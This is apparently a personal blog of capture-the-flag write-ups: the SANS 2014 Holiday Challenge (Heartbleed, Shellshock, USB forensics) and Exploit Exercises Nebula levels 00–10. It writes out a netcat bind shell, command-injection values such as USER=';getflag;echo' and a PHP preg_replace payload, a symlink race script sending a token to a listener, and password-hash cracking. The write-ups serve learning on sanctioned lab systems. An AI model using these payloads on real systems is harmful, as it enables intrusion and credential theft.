SANS Holiday Challenge 2014

SANS Holiday Challenge 2014

This document is a write up of the SANS 2014 Holiday Hacking challenge – their 11th installment of this challenge but the first one that I have participated in. The challenge was named ‘A Christmas Hacking Carol” and the backstory revolved around a hacker (Scrooge) that used to hack for good but has since lost his path. On Christmas Eve he is visited by three spirits and each of them delivers him a message that is supposed to make him change his ways. Our job is to solve three challenges that reveal what messages were delivered to Scrooge. For the whole story, visit http://pen-testing.sans.org/holiday-challenge/2014.

Challenge One

What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?

The first thing I did was perform an Nmap scan on every port of this system, to see what services the target is running:

image1

The target has a few open ports, but port 31124 seems to be the most interesting one. Nmap doesn’t know what is running on this port but whatever service it is, it is returning data. We can see from the Nmap output that it has a few different responses but the first one is “I AM ELIZA. WHAT’S ON YOUR MIND?” The backstory for this challenge mentioned a ‘friend’ named “Eliza” at this target, so the service on port 31124 was the one I focused on for this challenge.

I connected to the port using netcat, which opened up a conversation for me with Eliza:

image2

There seems to be a program running on port 31124 that takes user input and then responds with a pre-programmed sentence. Based on my initial input (of which there was more than you see in the screenshot), it didn’t look like my input had an effect on what was sent back to me.

The wrong solution:

It seemed that every response was just random, so I figured I had to ‘break’ the service to get to the secret. I wanted to feed it a lot of input quickly to see if I could figure out some method to the output I was sent, so I issued the following command:

image3

Here I am not actually sending the file line by line. Instead I am sending the entire contents of nmap.lst at once to the service, which makes the response interesting. Instead of sending me just one line back as a response for my input, it sends me several dozens of lines and some of them don’t make sense. For instance, the seventh response I get back is “REALLY—IF IT DOES ANY OF THE COMMENT FOLLOWING COMMENT O INTEGRATES SOURCE CODE FROM?”, which actually includes several words from commented out lines in nmap.lst. These results made me suspect that the program might be vulnerable to code injection.

To find out exactly what lines or characters make the program ‘break’ I again fed it the same file but this time instead of sending the entire file at once I sent it line by line:

image4

The screenshot here is of course only a very small part of the output but the results showed that when fed the wordlist line by line, the program did not respond back to me with nonsensical strings like it did when the entire file was fed to it at once. However, I did notice some interesting responses that I had not seen before, some of which are shown below:

image5

These two responses are clearly not random, but instead they are dependent on the input that was fed to the program. The first one echoes back some part of the input to the user -“it does any of the” – and the second one clearly triggered because my input contained the word “links” in it. These results made me suspect that trying to ‘break’ the program and attempting code injection was not the way to go. Maybe the responses to my input were not as random as I initially thought and I just needed to interact with the program to get to the secret.

The right solution:

One of the first questions I asked Eliza was “What is your secret?” The response I got immediately made me realize that interaction with the program, rather than breaking it, was the way to go to solve this challenge. It took me a while to figure out what words or sentences triggered certain responses in the program, but eventually I was able to figure out the most important ones. Below is a screenshot summarizing the conversation between Eliza and myself:

image6

As you can see from this conversation, I had to provide the keyword “secret” three times before Eliza gave me clear instructions on what to do. The first two times I provided a URL, I got a random response back. It wasn’t until after I said “secret” three times, and I included the words “surf” and “url” along with the actual link that Eliza retrieved the website header of the actual page that I sent. I didn’t spend time trying to figure out the logic behind the program, or what keywords and sequences of events are necessary for Eliza to retrieve a website header – it was enough for me that I got it to work.

So now what? The program retrieved a website header from a URL that I provided, but how does that get us the secret? My first guess was that the secret might be included with the GET request that Eliza sends out, and this guess turned out to be correct. I retrieved my website access logs, searched for a request from 173.255.233.59, and found the following:

173.255.233.59 – – [30/Dec/2014:09:27:23 -0700] “GET www.gerbenkleijn.com [REDACTED] Eliza Secret: \”Machines take me by surprise with great frequency. -Alan Turing\”” [REDACTED]

Challenge Two

The second challenge requires us to attack a website and find two secrets there. The website is www.scrooge-and-marley.com and we have permission to attack this site on port 80 and 443. Browsing to the URL shows a fairly simple website with a few pictures, a link or two, and an audio file. Inspecting the source code reveals nothing of interest. There is a phone number listed on the website with an extension: +1 641 715 3900 688365#. Calling this number plays a recorded message (in the same voice as the audio file on the website) that says Scrooge is not available and to please leave a message, which I did not do.

The main page also links to a contact page, with a contact form where a name, email address, and message can be filled out. Immediately I assumed I would have to perform some sort of injection attack here, but after firing up Burpsuite and intercepting a request I noticed that this information is not actually sent to the server.

image7

I suspected that the program ‘submit.sh’ is somehow vulnerable to code injection but I would have to figure out how to inject code into it, since no parameters seem to be passed to the program. Alternatively, it’s possible that the GET request itself is vulnerable to an injection attack and a server command might be executed alongside the ‘submit.sh’ program. These are options that I did explore but before describing my code injection attempts I’ll describe how I obtained the first secret from the website on port 443.

Preliminary tests show that the webserver is running Apache 2.2.22, which is not the most recent version of Apache. This might mean that other services are also not updated to their most recent version. Since Apache uses OpenSSL for Transport Layer Security (TLS), and older versions of OpenSSL are vulnerable to what has become known as “HeartBleed”, I decided to see if this was the case here. First I tried to see if it’s possible to easily obtain the version of OpenSSL that the server is using. Some servers provide this information in their communication, and to see if this was the case I issues the following commands:

image8

I did not receive the version of OpenSSL that the server is using – it would have been displayed under the “Server” header. I went ahead and tested for the HeartBleed vulnerability without knowing the version of OpenSSL, since it’s not a requirement for discovery or exploitation of this vulnerability.

Metasploit has an auxiliary scan module for HeartBleed, which I used against the server. I set “VERBOSE” to true so that the results don’t just show that the server is vulnerable, they will also show details about the communication and any information from the server’s memory that was compromised.

image9

The results showed the following:

image10

In the output it is clear to see the secret (URL Encoded):

Website Secret#1=Hacking can be noble.

So now let’s focus our attention on the potentially vulnerable shell script ‘submit.sh’. We already saw previously that filling out the contact form and hitting ‘submit’ doesn’t actually send the information to the server, so we can’t just inject some code into the forms and expect it to get executed by ‘submit.sh’.

The Wrong Solutions

First I’ll write about some things I tried that didn’t work. I include this because I learned a lot from the process of failing and hopefully someone else will find reading about my struggles educational as well.

Some testing revealed that it’s also not possible to perform code injection on the GET request itself:

image11

I tried many more forms of injection into the GET request than just the one shown here (URL encoding, using pipes, etc.) but none of them proved successful.

Other scan techniques I tried to get to the secret were running Nikto and running Dirbuster. Nikto showed that the server had “MultiViews” enabled, which could allow for bruteforcing of filenames. Basically, with MultiViews the server will select a file with a matching name even if the extension doesn’t match what was requested. This can be used in an attack: By submitting an altered and invalid GET request for a resource, the server will respond with valid files that match the filename. In the screenshot below I am requesting the file “a”, and I changed the “Accept” header from ‘text/html,application/xhtml+xml,application/xml;q=0.9*/*;q=0.8’ to ‘text/html,application/xhtml+xml,application/xml;q=1’. The server responds with a 406 error and shows me all the valid files it has for “a”, which are “a.mp3” and “a.ogg”:

image12

What I did next was run DirBuster with a custom header, formatted in the same invalid way (You can set these headers under advanced options). I also specified DirBuster to use a “blank extension”. I let it run for several hours, but it never found additional files beyond what was obviously there: and index page and a contact page, two audio files, four image files, and submit.sh.

image13

The Right Solution

After having tried several methods that didn’t get me anywhere, it occurred to me that ‘submit.sh’ might be a hint to the right solution. ‘Submit.sh’ is a shell script – maybe I should look into exploiting the server through the Shellshock  vulnerability.

I had never used the Shellshock exploit before so it took me a little while to get the syntax right. In fact, it took me so long to get it right that I doubted I was on the right path and started looking at other options again. Fortunately, eventually I returned to attempting the Shellshock exploit and I finally succeeded in getting information from the server with the following command:

image14

Of course, the next commands I tried were ‘ls’, ‘cat’, ‘whoami’, and more basic commands to list files and directories and get information from the server. However, all of these commands returned nothing back to me, not even HTML code. From this I deduced that these server commands were all disabled, and I could only use the very basic of commands to find my way around.

I used ‘echo’ to find may way through the server’s directories and files:

image15

As is clear in the output, there is a file or folder named ‘/secret’. Clearly that is where we should be looking. I tried to see if it was a file or folder we were dealing with by issuing the following commands:

image16

Echoing “/secret/*” just echoes the same thing back to me, whereas echoing “/etc/*” gives me a list of files and folders in the /etc/ directory. Based on that difference in output, I deduced that /secret must be a file, not a folder.

Here’s where we go wrong again for a while. The right solution is a little further down.

Some Google research revealed a way to output file content with the ‘echo’ command, since we don’t have ‘cat’ available:

Echo “$(<filename)”

However, trying this on the “/secret” file gave me the following results:

image17

It seems like the server is saying that there is no “/secret” file. To make sure that my command works, I also tried it on “/etc/passwd”:

image18

These results made it seem like the command worked on the “/etc/passwd” file but not on the “/secret” file. Maybe “/secret” wasn’t a file after all. Maybe it’s a folder with a hidden file in it:

image19

The first couple of commands on my local system show that ‘echo’ can reveal hidden files. However, trying the same command on the remote system again only echoed the command back to me, suggesting there are no hidden files. This is where I got stuck for a while. It seems like there is a secret file in the root directory of the web server, but there doesn’t seem to be a way for me to read it….

Eventually I decided not to try a different technique, but instead to try a different tool. I used BurpSuite to issue the exact same command, and to my surprise I got the secret echoed back to me immediately!

image20

There it is!

Website Secret #2: Use your skills for good.

So why did the same command work over BurpSuite and not through Curl?? I really hate it when something suddenly works and I don’t understand why, so I decided to investigate this issue. I went back to using Curl, and set it to use BurpSuite as a proxy so that I might investigate what is actually sent to the server. The results are below:

image21

image22

As you can see, I never actually sent the right command to the server. Looking again at my Curl command, I immediately felt like an idiot. I was using double quotes inside of double quotes, so I ended my command early. The feedback “bash: /secret: No such file or directory” never came from the remote system; that feedback came from my own system and just happened to be in the same spot as where feedback from the remote system would be! This also explains why the command didn’t work for “/secret” but it did work for “/etc/passwd”, since my local system actually has an “/etc/passwd” file.

Once I changed the outer quotation marks to single quotes, the command worked just fine (remember, you can’t put single quotes inside double quotes but you can put double quotes inside single quotes):

image23

Challenge Three

This challenge required the retrieval of four secrets from the contents of a USB drive using forensic investigation techniques. After downloading the file, I inspected it with some of the tools in the Sleuth Kit (TSK). The first thing I did was issue the following command:

image24

This provided me with general information about the USB drive, such as its filesystem (NTFS), serial number, name, cluster size, etc.

Next, I wanted to have a look at the contents of the USB drive, so I used another TSK command:

image25

This showed me the allocated and deleted files on the USB drive. The USB drive seems to contain the following files:

  • Hh2014-chat.pcapng
  • Hh2014-chat.pcapng:Bed_Curtains.zip
  • doc
  • jpg

Two things are interesting to note right off the bat from this list of files: Hh2014-chat.pcapng:Bed_Curtains.zip seems to be at the same location on the USB drive as Hh2014-chat.pcapng. The colon separating the first part of the file name from the second part suggests this file is hidden using alternate data streams. Secondly, Tiny_Tom_Crutches_Final.jpg seems to be a deleted file, as indicated by the asterisk in front on the metadata address.

I extracted the files from the USB drive using the following commands:

image26

After some initial inspection of the files I decided to focus on letterfromjacktochuck.doc, because this is a text document. I figured if there was a secret hidden in this document, it might be easier to retrieve than a secret hidden in a jpg file or a network capture. Opening the file didn’t provide me with a secret – true to its file name it just contained a letter from Jack to Chuck. However, the following command showed me that there was actually a secret hidden in the file’s metadata:

image27

USB Secret #1: “Your demise is a source of mirth.”

The second file I investigated was the PCAP file, which I opened using Wireshark. The file contains 2205 packets, sent over a time period of about six minutes. Several different protocols show up throughout the PCAP file but it quickly became clear that the traffic of interest consists of HTTP POST requests between two clients. The clients are both logged in to a chat service (chat.scrooge-and-marley.com) and messages are posted using the POST method. Filtering to show just the POST requests show the following conversation between the clients:

10.10.10.124 – “My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able to scrape together enough to meet him minimum payment and stay out of debtor’s prison. Please tell me of your progress, my love.”

10.10.10.123 – “As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear.”

10.10.10.124 – “Is it good… or bad?”

10.10.10.123 – “Bad.”

10.10.10.124 – “We are quite ruined.”

10.10.10.123 – “No. There is hope yet, Caroline.”

10.10.10.124 – “If he relents, there is. Nothing is past hope, if such a miracle has happened.”

10.10.10.123 – “He is past relenting. He is dead.”

10.10.10.124 – “That is wondrous news! To whom will our debts be transferred?”

10.10.10.123 – “I don’t know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!”

10.10.10.124 – “I’ve just told our children about Mr. Scrooge’s death, and all of their faces are brighter for it. We now have a very happy house. I so love you.”

10.10.10.123 – “I shall see you soon, my dear. Lovingly – Samuel.”

There is no secret hidden in these messages, but while going through the packets I did notice that packet number 2000 and packet number 2105 – both of which were part of this conversation – had comments to them.

image28

The comment in packet number 2000 was:

“VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==”

The comment in packet 2105 was:

https://code.google.com/p/f5-steganography/

The second comment is a link to information on steganography, which we will use to retrieve another secret. The first comment seems to be encoded information. While the method for encoding could be anything, at first glance it looked like base64 encoding to me, so I entered the code into a base64 decoded online. The result revealed the second secret:

image29

“USB Secret #2: Your demise is a source of relief.”

The third file that I decided to investigate was Bed_Curtains.zip which was hidden in the PCAP file. Had I investigated the USB drive using Windows, this file might have been more difficult to find. However, The Sleuth Kit immediately showed me the presence of this file and the necessary information to carve it out.

Unzipping the zip file showed me that a password was required:

image30

In order to get to the zip file I need to find the password. Either the password is hidden somewhere else on the USB drive, or I might be able to bruteforce it by using a zip password cracking tool like fcrackzip. I decided to try the second options first.

I ran fcrackzip with smaller password lists first, such as password.lst from John the Ripper and nmap.lst because they don’t take as long to go through as a large password list like rockyou.txt. However, I didn’t find the password until I ran the program with the rockyou password list:

image31

With the password I was able to unzip Bed_Curtains.zip, which gave me the file “Bed_Curtains.png”. This turned out to be an image file of a page in “A Christmas Carol”. The image itself didn’t contain a secret, but running the ‘strings’ command on the image file as was previously done on the text document did reveal the third secret:

image32

“USB Secret #3: Your demise is a source of gain for others.”

This leaves one final file to inspect on the USB drive: Tiny_Tom_Crutches_Final.jpg. Opening the file reveals just a picture of crutches on a table – there is no information in the image itself that leads to the secret. Running the ‘strings’ command on the file also doesn’t reveal any information. I suspected that information was hidden in the file by the use of steganography, especially since a comment in the packet capture file earlier led to a site about the F5 steganography program.

I downloaded and compiled the program ‘stegdetect’ on Kali Linux, and I ran stegdetect on the JPG file.

image33

As you can see from the results, stegdetect found F5 steganography embedded in the JPG file. Assuming there is no password protection, we should be able to use the F5 program to reveal the hidden information in the JPG file. I downloaded the F5 program, which is a Java (.jar) file, and ran it without a password, hoping that no password would be required:

image34

USB secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.”

 

 

Exploit Exercises – Nebula

The Exploit Exercises website provides a number of virtual machines which can be downloaded, and each virtual machine provides the user with a different set of exploitation challenges. In this blog post we’ll take a look at the challenges provided in the Nebula virtual machine, which focus on local Linux exploits and source code vulnerabilities. Nebula consists of 20 challenges which get increasingly more difficult. At the time of writing I’ve only made it to challenge 11 and it looks like I’ll have to improve my coding abilities before I’ll be able to make it further. I’ll keep updating this blog post as I learn more and complete more challenges.

 

Level00

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

Executing the command ‘find / -name flag00’ reveals an executable – flag00 – located in a hidden directory: /bin/…/. Executing this file elevates the user to the ‘flag00’ account, at which point the command ‘getflag’ can be executed.

 

Level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the file is that the command ‘echo’ is executed using ‘/usr/bin/env’. Normally the ‘echo’ command refers to one specific application. Mine refers to ‘/bin/echoyou can find yours by typing ‘which echo’. However, by using ‘/usr/bin/env echo’ the operating system will actually look for the ‘echo’ application in the directories specified by the $PATH environment variable. This allows the attacker to modify the $PATH variable and provide a different ‘echo’ application to be executed.

The attacker can add their home folder to $PATH using the command PATH=/home/level01:$PATH. The home folder now appears in the $PATH variable before any of the other folders, meaning it is the first place where Linux will look. The attacker then adds a file called ‘echo’ with a command inside, such as /bin/getflag and makes the file executable using the command chmod 777 echo. Since the vulnerable program gets executed with the permissions of flag01, so does ‘/bin/getflag’.

 

Level02

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the code is that it calls an environment variable that can be changed by the attacker, namely $USER. Normally, $USER holds the name of the current user account. When executing the program, it will echo “level02 is cool”:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo level02 is cool”)

level02 is cool

Using the command USER=”;getflag;echo” the attacker can inject lines into the code. The results are the following:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo ;getflag;echo is cool”)

You have successfully executed getflag on a target account

is cool

 

Level03

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

The premise of this level is easy enough; a cronjob executes every couple of minutes and it will execute everything in the /home/flag03/writable.d’ directory. The attacker can create a file, make it executable, place it in the /home/flag03/writable.d directory and the command(s) will get executed. One thing to keep in mind is that even though you can trigger the job to run by executing /home/flag03/writable.sh this will not work because the job will execute with your (level03) permissions. You need to wait for the task to execute automatically so that it runs with flag03 permissions.

The issue is that the output of the commands will not appear in your shell, so you can’t see the results of successfully running the ‘getflag’ command. You can trust that the command ran successfully but this is a little anti-climactic. An alternative is that instead of just running ‘getflag’ you redirect the output results to a file, like so:

getflag > /tmp/output.txt.

Just make sure that the output gets saved in a location where flag03 has write permissions.

Of course, if you want to get a shell so that you can manually execute the ‘getflag‘ command there are ways to do that too. One way is to have the script open a local port with netcat and to assign a shell to anyone that connects, using the command:

nc.traditional –l –p 4444 –e /bin/bash.

You can then connect remotely to the port and you’ll be given a shell to the system with all the privileges of the flag03 account.

 

Level04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Source code for this challenge can be found here.

The source code for this challenge tells us that the vulnerable program will not open any file that has “token” in the name. The solution here was simple; since we cannot open any file with ‘token’ in the name, we create a hard link to the ‘token’ file with a different name using the command:

ln /home/flag04/token /home/level04/hardlink.

We can then execute the ‘flag04’ program on the hardlink, and it will actually run on the token file.

level04@nebula:/home/flag04$ ./flag04 /home/level04/hardlink
06508b5e-8909-4f38-b630-fdb148a848a2

The content of the token file is actually the password to the flag04 account – something that we’ll see again in later challenges. This allows us to log in as flag04 and run the ‘getflag‘ command.

 

 

Level05

Check the flag05 home directory. You are looking for weak directory permissions.

Investigation of the ‘/home/flag05‘ folder shows that there are two hidden directories: ‘.ssh’ and ‘.backup’. The ‘.ssh’ directory typically contains private ssh keys. If we can get our hands on flag05’s private ssh key we should be able to establish an ssh session under flag05’s account without having to enter a password, as long as the private ssh key is not encrypted with a passphrase.

Unfortunately, the ‘/home/flag05/.ssh’ directory has restrictive permissions and the level05 account doesn’t have access to it. Let’s try the ‘/home/flag05/.backup’ directory instead. This directory has a gzipped file in it named ‘backup-19072011.tgz’. The directory and the file have weak permissions set, and the level05 account has access to them. We can copy the file over to our home directory, unzip it, and inspect it.

It turns out that backup file contains a copy of an RSA private key. We’ll continue under the assumption that this is the private key for flag05. It doesn’t specifically say that in the file, but since it was found in flag05’s home directory it is a safe assumption. We can proceed to copy the file over to our remote system using the following command:

scp backup-19072011 root@<IP ADDRESS>:/root/

In order to establish an ssh session without having to provide a password for flag05, we need to copy the private RSA key into ‘/root/.ssh/id_rsa’. Note that I’m logged into my system as root so that’s where the key goes. If you’re logged in as a different user, use the ‘.ssh’ folder under your home directory instead.

Before copying the private RSA key over, we need to remove some of the other information that was in the backup file. Specifically, everything that is not in between the following lines:

—–BEGIN RSA PRIVATE KEY—–

MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
<MORE LINES>

HWPayRhNBlkmulqTs5GHvLMPjcKMB0k0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr

—–END RSA PRIVATE KEY—–

You may also want to create a backup of the ‘id_rsa‘ file that is already there on your system, so that you can restore it to how it was at a later stage.

cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bak

Once you copy the right content into ‘/root/.ssh/id_rsa’ you can then establish an ssh session under the flag05 account and you will not be prompted for a password:

root@kali:~# ssh flag05@<Exploit Exercises IP Address>

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

If you are getting an error message while trying to connect or if you are asked for a passphrase or password it means there is something wrong with the format of the ‘id_rsa’ file. Try establishing an ssh session using the ‘- v’ command for verbose output to troubleshoot the issue.

 

Level06

The flag06 account credentials came from a legacy unix system.

This level requires us to do some basic password cracking. The description for the level tells us we have to inspect flag06’s account credentials, which means we have to look at the ‘/etc/passwd‘ file. The password file clearly shows that the entry for flag06 is different from those for other accounts:

cat /etc/passwd

level05:x:1006:1006::/home/level05:/bin/sh
flag05:x:994:994::/home/flag05:/bin/sh
level06:x:1007:1007::/home/level06:/bin/sh
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level07:x:1008:1008::/home/level07:/bin/sh
flag07:x:992:992::/home/flag07:/bin/sh

On old UNIX systems, a user’s password hash would be stored in the ‘/etc/passwd’ file, as is the case for flag06. To crack this hash, we simply copy the entry for flag06 over into a file on our system and run John the Ripper (a common password cracking tool) against it.

root@kali:~# john flag06.pwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello (flag06)
guesses: 1 time: 0:00:00:00 DONE (Sun Nov 16 10:07:08 2014) c/s: 39341 trying: 123456 – Pyramid
Use the “–show” option to display all of the cracked passwords reliably

The password is “hello”. We can now log ssh into the flag06 account and successfully execute the ‘getflag’ command.

 

Level07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

Source code for this challenge can be found here.

There are two files located in the ‘/home/flag07‘ directory: ‘index.cgi’ and ‘thttpd.conf’. The first is a simple Perl script and the second is a configuration file for a web server. Reading the configuration file reveals that the server is running on port 7007 and should be running under the ‘flag07’ user.

Using our remote system to connect to the web server it was determined that index.cgi is accessible to anyone, using the link:

http://<webserver>:7007/index.cgi

 The Perl script can be invoked by passing an argument to index.cgi, such as http://<webserver>:7007/index.cgi?Host=127.0.0.1. The source code of the Perl script doesn’t seem to perform any input validation or sanitation, so we should be able to pass more than just a host address to it. By using a pipe, we can pass the script a system command that will also get executed:

http://<webserver>:7007/index.cgi?Host=127.0.0.1|getflag

This provided the message that ‘getflag’ was successfully executed on a target account.

 

Level08

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

The folder ‘/home/flag08‘ contains a network capture file: ‘capture.pcap’. The easiest way to analyze a PCAP file is using Wireshark, but it’s not the only way. To use Wireshark, copy the PCAP file over to your remote system using the secure copy command (scp). You can also analyze the file on the local system, but instead of Wireshark you’ll have to use tcpdump. Tcpdump is what I’ll use in the walkthrough for this challenge.

tcpdump –qns 0 –X –r capture.pcap

The output won’t be particularly easy to read but once you know what you’re looking for it’s fairly straightforward. The first couple of packets can be ignored – these have to do with establishing the session. What we’re interested in comes after you see the following:

21:23:12.339391 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 75
E…..@.@..A;…
;…/Y.O…….t
….K………..
…(..Linux.2.6.
38-8-generic-pae
.(::ffff:10.1.1.
2).(pts/10)…..
wwwbugs.login:.

Note that I removed the hex code and only kept the ASCII for better legibility.

This packet shows that the user was trying to log into a service – there is a clear prompt for a username and password. The next couple of packets will show us the login name that the user entered. However, you won’t see one single packet with a username in it. Instead the traffic looks like telnet traffic, in which a single entered character is sent to the server and the server echoes it back to the user. Additionally, you have to know what part of the packet to look at. The following packets will demonstrate this:

21:23:24.491452 IP 59.233.235.218.39247 > 59.233.235.223.12121: tcp 1

E..5..@.@.J:;…
;….O/Y…t….
…s…………
….l

21:23:24.496998 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 2

E..6..@.@…;…
;…/Y.O…….u
…..r……..:.
…..l

21:23:24.591456 IP 59.233.235.218.39247 > 59.233.235.223.12121: tcp 1

E..5..@.@.J8;…
;….O/Y…u….
…s.%……….
..:.e

21:23:24.597002 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 2

E..6..@.@…;…
;…/Y.O…….v
…..S……..:.
…..e

As you can see, most of the information in the packets is not of interest to us. Only the last character is what the user actually entered in the command prompt, and this character is echoed back by the server. Going through the next few packets shows us that the user entered ‘level8’ as their username.

Skipping a few packets, we can then see the server prompting the user for a password:

21:23:26.095219 IP 59.233.235.223.12121 > 59.233.235.218.39247: tcp 13

E..A..@.@..w;…
;…/Y.O…….{
….’………<b
…….Password:
.

The password was more difficult to decipher than the username was. First of all, the server doesn’t echo anything back like with the username, most likely as a security measure – you often don’t get to see the password as you’re typing it in so as to avoid someone shoulder surfing you. This is not necessarily an issue but it makes it a little bit harder to figure out what the user sent and what the server received.

The first part of the password was easy enough: ‘backdoor’. However, after backdoor there is a series of messages sent between the user and the server that doesn’t seem to contain anything, except some periods. Then there are a few more packets with legible characters: ‘00Rm8’. Then there are some more periods, and finally the user sends three more characters to the server: ‘ate’.

After going through the file a few more times, I finally deducted that what the user sent to the server in its entirety was: ‘backdoor…00Rm8.ate’. From that string, it’s easy to figure out that a period represents a backspace – the user made a couple of mistakes while typing in the password and corrected them. Therefore, the password that was sent to the server was ‘backd00Rmate’.

This password allows for logging in to the Nebula box as the flag08 account, at which point you can successfully execute the ‘getflag’ command.

 

Level09

There’s a C setuid wrapper for some vulnerable PHP code…

Source code for this challenge can be found here.

There are two files under ‘/home/flag09‘: an executable called ‘flag09’, and a PHP sourcecode file called ‘flag09.php’ which is called by ‘flag09’ when executed. The PHP script calls a function that takes two parameters from the command line, although it only actually uses the first one. The first parameter is supposed to be the path to a file. The contents of that file will be modified in the function according to some regex and then output to the screen.

The function uses the PHP built-in function ‘preg_replace()’ to modify how it outputs the file contents. If it encounters any lines that include the string “[email” it then calls another function – spam() – by use of the ‘/e’ modifier. The preg_replace() function with the ‘-e’ modifier leaves it open to potential exploitation. You can read about this vulnerability here: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace.

We have to do two things to exploit this vulnerability; we have to set the value of the ‘$use_me’ me variable and we have to call it inside of a file, while making sure that it gets executed when the spam() function is called. The first part is easy; the PHP script sets $use_me to whatever our second argument on the command line is. Then we have to call it. I created a file in ‘/home/level09‘ called “test.txt” and it contained the following string:

[email system($use_me)]

I then ran the ‘flag09’ file as follows:

/home/flag09/flag09 /home/level09/test.txt getflag.

The results:

level09@nebula:~$ System(getflag).

Apparently, I am successfully calling the $use_me variable, but the system command itself is not getting executed. In order for this command to be interpreted and executed as a system command, it has to be wrapped in curly braces. After some experimentation, the following syntax worked for me:

[email {${system($use_me)}}]

Again executing the flag09 program with the same command line arguments now resulted in the following:

level09@nebula:~$ /home/flag09/flag09 /home/level09/test.txt getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Despite an error thrown by the script because the code injection affects its interpretation of PHP code, the getflag command was successfully executed.

 

Level10

The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.

Source code for this challenge can be found here.

The source code for level 10 outlines a program that takes two command line arguments. The first one is a file path, and the second one is a host to send the file to. If the user has access to the file, the program writes the contents of it to port 18211 on the specified host.

There is also a ‘token’ file located in the flag10 home directory, but the ‘level10’ user doesn’t have read access to this file. It seems the challenge is to somehow exploit the program to provide us with access to the token file.

Inspection of the source code shows that it might be vulnerable to a “TOCTTOU” attack, which stands for “Time Of Check To Time Of Use”. Basically this vulnerability exists when a program first checks a condition, and then uses the result of this check at a later time. In the source code for this challenge, the program checks if the user has access to a file at line 24 and it opens the file for reading of its contents at line 54. Using a TOCTTOU attack means that a file is provided to the program that the user has access to so that the result of line 24 is “true”, and then swapping out the file for another file that the user doesn’t have access to (the token file) before line 54.

There are a couple of preparatory steps that need to be taken before attempting to exploit the program. First of all, a script needs to be run that continuously swaps out a file that we have access to with the token file. The easiest way to accomplish this is to create a symbolic link to a file and to have the script change the target of the symbolic link back and forth. The commands for this are:

Echo “testing token” > faketoken               #create fake token file

Ln –sf /home/level10/faketoken file          #create symbolic link named file and point to fake token file

Vi tocttouscript.sh                                          #create tocctou script

#!/bin/bash

COUNT = 1;                                                      #create counter

While true                                                        #run forever

Do

               Echo $COUNT;                                 # I like to echo counters on each run to make sure it’s running

               Ln –sf /home/flag10/token file;                  # switch out symbolic link target

               Ln –sf /home/level10/faketoken file;         # switch out symbolic link target

               COUNT=$((COUNT+1))                   #increase counter by one

Done

So now we have the symbolic link and the shell script responsible for constantly changing out the target. We also need to set up a host to listen on port 18211 for the incoming file. I simply opened up a port with netcat on my remote system. The command for this is:

Ncat –l 18211 –keep-open

The ‘keep-open’ flag is important here because without it, the connection gets closed as soon as input is received. The TOCTTOU attack is somewhat of a trial and error attack – the swapping out of the files has to happen at the exact right moment (between the moment the access permissions are checked and the moment the result of the check is used) and this is unlikely to happen on the first occurrence. Numerous repeated attempts will be made until the timing is just right and everything lines up, so we want to make sure our host and port keep listening until that happens.

Now everything is in place to start the attack. The first thing to do is to start the script we wrote to start the swapping of the files that the symbolic link points to.

./TOCTTOUscript.sh

Next we want to execute the ‘flag’ program, but we don’t want to execute it just once. We want to execute it multiple times in a row because again – this exploit is somewhat of a trial and error process. To accomplish this we could write a second script and execute that, or we can simply execute a while-loop from the command line, where ‘<host>’ gets replaced with the IP address for your listening server:

While true; do /home/flag10/flag /home/level10/file <host>; done

Below is some of the information that I received on my open netcat connection:

root@kali:~# ncat -l 18211 –keep-open
.oO Oo.
testing token
.oO Oo.
testing token
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
.oO Oo.
testing token

As you can tell, the first two runs of the program did not coincide with the files being correctly swapped, but the next two runs did. The contents of the ‘token’ file seems to be “615a2ce1-b2b5-4c76-8eed-8aa5c4015c27”. Establishing another ssh connection from Kali to the Exploit Exercises box and authentication with username “flag10” and the token as password results in a successful login. We can now execute the ‘getflag’ command and complete this challenge.

 

That is as far as I’ve gotten so far with Exploit Exercises. As I complete more challenges, I’ll add more entries to this blog post.

Back to Top

CySCA2014 Web Application Pentest

CySCA2014 Write-Up

CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.

Web Application Pentest

